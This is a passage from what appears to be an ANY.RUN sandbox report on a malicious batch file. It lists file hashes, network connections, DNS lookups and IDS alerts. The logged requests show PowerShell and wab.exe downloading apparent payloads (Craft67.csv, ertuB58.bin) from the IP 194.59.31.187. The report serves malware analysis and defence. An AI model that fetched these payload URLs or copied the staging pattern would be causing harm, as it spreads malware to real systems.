SHA256:F7D111D1444D17A5717A3CD1371C49F1E5C959FB90FD012CFED2D3BE4680A276
2600WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WERB0AD.tmp.xmlxml
MD5:719001509D8348E29A78F87A179DE09A
SHA256:1E8781F7405240B0CA15F3180F7D9F924AFAC06162F432BBC03BDE59F131C4CF
3824powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:453F98E33EDC34049842DD955610E482
SHA256:B65BF10BE92326F6D1C5DAB4BBEBA901BFDF3280B8D9B0FBA8A86BB04F884106
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
59
DNS requests
22
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3824
powershell.exe
GET
200
194.59.31.187:80
http://194.59.31.187/Craft67.csv
unknown
unknown
5504
svchost.exe
GET
200
72.247.176.73:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
5504
svchost.exe
GET
200
23.200.189.225:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
6036
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
unknown
624
SIHClient.exe
GET
200
23.200.189.225:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
unknown
624
SIHClient.exe
GET
200
23.200.189.225:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
unknown
5600
wab.exe
GET
200
194.59.31.187:80
http://194.59.31.187/ertuB58.bin
unknown
unknown
2600
WerFault.exe
GET
200
72.247.176.73:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
2600
WerFault.exe
GET
200
23.200.189.225:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
239.255.255.250:1900
unknown
5504
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
5520
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
5140
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
5504
svchost.exe
72.247.176.73:80
crl.microsoft.com
Akamai International B.V.
GB
unknown
3824
powershell.exe
194.59.31.187:80
COGENT-174
BG
unknown
5504
svchost.exe
23.200.189.225:80
www.microsoft.com
Moratelindo Internet Exchange Point
ID
unknown
4
System
192.168.100.255:138
whitelisted
5140
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 72.247.176.73
  • 95.101.63.66
whitelisted
www.microsoft.com
  • 23.200.189.225
whitelisted
www.bing.com
  • 95.101.63.39
  • 2.17.113.82
  • 2.17.113.104
  • 2.17.113.88
  • 2.17.113.99
  • 2.17.113.96
  • 2.17.113.105
  • 95.101.63.31
  • 95.101.63.33
whitelisted
r.bing.com
  • 2.17.113.96
  • 2.17.113.82
  • 95.101.63.33
  • 95.101.63.39
  • 2.17.113.99
  • 95.101.63.31
  • 2.17.113.104
  • 2.17.113.105
  • 2.17.113.88
whitelisted
login.live.com
  • 20.190.160.14
  • 40.126.32.76
  • 40.126.32.74
  • 20.190.160.17
  • 20.190.160.20
  • 40.126.32.136
  • 40.126.32.134
  • 40.126.32.68
  • 40.126.32.140
  • 40.126.32.133
whitelisted
go.microsoft.com
  • 23.200.185.159
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
slscr.update.microsoft.com
  • 52.165.165.26
whitelisted
nexusrules.officeapps.live.com
  • 52.111.243.31
whitelisted

Threats

PID
Process
Class
Message
3824
powershell.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 39
5600
wab.exe
Potentially Bad Traffic
ET HUNTING Generic .bin download from Dotted Quad
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
69acba5561c375a92d1b6354e63334cbb2184d6ae64583a189202d892248cd8b.bat